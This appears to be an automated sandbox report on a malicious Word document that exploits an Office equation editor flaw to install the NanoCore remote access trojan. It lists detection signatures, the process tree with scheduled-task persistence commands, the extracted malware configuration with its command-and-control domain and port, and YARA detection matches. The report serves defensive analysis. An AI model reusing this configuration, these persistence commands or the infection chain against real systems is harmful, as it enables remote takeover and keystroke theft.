Play interactive tour

Edit tour

Windows Analysis Report Purchase order_122.doc

Overview

General Information

Sample Name:	Purchase order_122.doc
Analysis ID:	509411
MD5:	725c046a9a1bd2456115102985d98dd4
SHA1:	dce11d03bb6838c7761865f5149251d01df65946
SHA256:	9f33c3635ba0c704775ea7c0388955e5649ab913987d990e05f121b6c1681b7c
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Sigma detected: EQNEDT32.EXE connecting to internet

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Yara detected AntiVM3

Detected Nanocore Rat

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Yara detected Nanocore RAT

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Writes to foreign memory regions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Office equation editor drops PE file

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses dynamic DNS services

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Installs a raw input device (often for capturing keystrokes)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Office Equation Editor has been started

Contains functionality to detect virtual machines (SLDT)

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2660 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2724 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

catzjt7863.exe (PID: 1848 cmdline: C:\Users\user\AppData\Roaming\catzjt7863.exe MD5: ACE96CF7EF24EEAC993B4DA172A5A8F0)

schtasks.exe (PID: 2024 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

RegSvcs.exe (PID: 2936 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)

schtasks.exe (PID: 2524 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

schtasks.exe (PID: 1964 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

taskeng.exe (PID: 684 cmdline: taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

RegSvcs.exe (PID: 1268 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0 MD5: 72A9F09010A89860456C6474E2E6D25C)

smtpsvc.exe (PID: 3048 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 72A9F09010A89860456C6474E2E6D25C)

smtpsvc.exe (PID: 1968 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 72A9F09010A89860456C6474E2E6D25C)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "70bb352e-dceb-4105-9fdd-010e83e2", "Group": "NEW LIFE", "Domain1": "drrkingsleym001.ddns.net", "Domain2": "drrkingsleym001.ddns.net", "Port": 1665, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f196d:$x1: NanoCore.ClientPluginHost 0x1f19aa:$x2: IClientNetworkHost 0x1f54dd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1f16d5:$a: NanoCore 0x1f16e5:$a: NanoCore 0x1f1919:$a: NanoCore 0x1f192d:$a: NanoCore 0x1f196d:$a: NanoCore 0x1f1734:$b: ClientPlugin 0x1f1936:$b: ClientPlugin 0x1f1976:$b: ClientPlugin 0xb9269:$c: ProjectData 0x10d289:$c: ProjectData 0x1f185b:$c: ProjectData 0x1f2262:$d: DESCrypto 0x1f9c2e:$e: KeepAlive 0x1f7c1c:$g: LogClientMessage 0x1f3e17:$i: get_Connected 0x1f2598:$j: #=q 0x1f25c8:$j: #=q 0x1f25e4:$j: #=q 0x1f2614:$j: #=q 0x1f2630:$j: #=q 0x1f264c:$j: #=q
00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000004.00000002.454727273.00000000024A6000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x103cd:$x1: NanoCore.ClientPluginHost 0x1040a:$x2: IClientNetworkHost 0x13f3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10135:$a: NanoCore 0x10145:$a: NanoCore 0x10379:$a: NanoCore 0x1038d:$a: NanoCore 0x103cd:$a: NanoCore 0x10194:$b: ClientPlugin 0x10396:$b: ClientPlugin 0x103d6:$b: ClientPlugin 0x102bb:$c: ProjectData 0x10cc2:$d: DESCrypto 0x1868e:$e: KeepAlive 0x1667c:$g: LogClientMessage 0x12877:$i: get_Connected 0x10ff8:$j: #=q 0x11028:$j: #=q 0x11044:$j: #=q 0x11074:$j: #=q 0x11090:$j: #=q 0x110ac:$j: #=q 0x110dc:$j: #=q 0x110f8:$j: #=q
00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3a75:$a: NanoCore 0x3ace:$a: NanoCore 0x3b0b:$a: NanoCore 0x3b84:$a: NanoCore 0x1722f:$a: NanoCore 0x17244:$a: NanoCore 0x17279:$a: NanoCore 0x3022b:$a: NanoCore 0x30240:$a: NanoCore 0x30275:$a: NanoCore 0x3ad7:$b: ClientPlugin 0x3b14:$b: ClientPlugin 0x4412:$b: ClientPlugin 0x441f:$b: ClientPlugin 0x16feb:$b: ClientPlugin 0x17006:$b: ClientPlugin 0x17036:$b: ClientPlugin 0x1724d:$b: ClientPlugin 0x17282:$b: ClientPlugin 0x2ffe7:$b: ClientPlugin 0x30002:$b: ClientPlugin
00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
Process Memory Space: catzjt7863.exe PID: 1848	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x7f906:$x1: NanoCore.ClientPluginHost 0x7f943:$x2: IClientNetworkHost 0x82d76:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x8da28:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x25da4b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: catzjt7863.exe PID: 1848	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: catzjt7863.exe PID: 1848	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: catzjt7863.exe PID: 1848	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x7f6b5:$a: NanoCore 0x7f6c5:$a: NanoCore 0x7f716:$a: NanoCore 0x7f725:$a: NanoCore 0x7f8b2:$a: NanoCore 0x7f8c6:$a: NanoCore 0x7f906:$a: NanoCore 0x8a092:$a: NanoCore 0x8a0a4:$a: NanoCore 0x8a0e0:$a: NanoCore 0x25a0b5:$a: NanoCore 0x25a0c7:$a: NanoCore 0x25a103:$a: NanoCore 0x7f6d9:$b: ClientPlugin 0x7f76f:$b: ClientPlugin 0x7f8cf:$b: ClientPlugin 0x7f90f:$b: ClientPlugin 0x8a0ad:$b: ClientPlugin 0x8a0e9:$b: ClientPlugin 0x25a0d0:$b: ClientPlugin 0x25a10c:$b: ClientPlugin
Process Memory Space: RegSvcs.exe PID: 2936	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6728:$a: NanoCore 0x6738:$a: NanoCore 0x678d:$a: NanoCore 0x679c:$a: NanoCore 0x10d9e:$a: NanoCore 0x10db0:$a: NanoCore 0x10dec:$a: NanoCore 0x213b8:$a: NanoCore 0x29a23:$a: NanoCore 0x29a35:$a: NanoCore 0x29a71:$a: NanoCore 0x1d1509:$a: NanoCore 0x1d155c:$a: NanoCore 0x1d1595:$a: NanoCore 0x1d1608:$a: NanoCore 0x200782:$a: NanoCore 0x202547:$a: NanoCore 0x20255a:$a: NanoCore 0x20258c:$a: NanoCore 0x20ad9a:$a: NanoCore 0x20adad:$a: NanoCore
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegSvcs.exe.3678c96.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5df:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d60c:$x2: IClientNetworkHost
7.2.RegSvcs.exe.3678c96.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5df:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6ba:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d5f9:$s5: IClientLoggingHost
7.2.RegSvcs.exe.3678c96.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.RegSvcs.exe.3678c96.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d595:$a: NanoCore 0x2d5aa:$a: NanoCore 0x2d5df:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d351:$b: ClientPlugin 0x2d36c:$b: ClientPlugin
7.2.RegSvcs.exe.560000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
7.2.RegSvcs.exe.560000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
7.2.RegSvcs.exe.560000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.catzjt7863.exe.36dc7e0.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.catzjt7863.exe.36dc7e0.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.catzjt7863.exe.36dc7e0.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.catzjt7863.exe.36dc7e0.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.RegSvcs.exe.550000.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
7.2.RegSvcs.exe.550000.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
7.2.RegSvcs.exe.564629.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
7.2.RegSvcs.exe.564629.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
7.2.RegSvcs.exe.564629.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.0.RegSvcs.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.0.RegSvcs.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.0.RegSvcs.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.0.RegSvcs.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.catzjt7863.exe.36dc7e0.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.catzjt7863.exe.36dc7e0.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.catzjt7863.exe.36dc7e0.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.catzjt7863.exe.36dc7e0.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
7.2.RegSvcs.exe.2641260.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
7.2.RegSvcs.exe.2641260.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
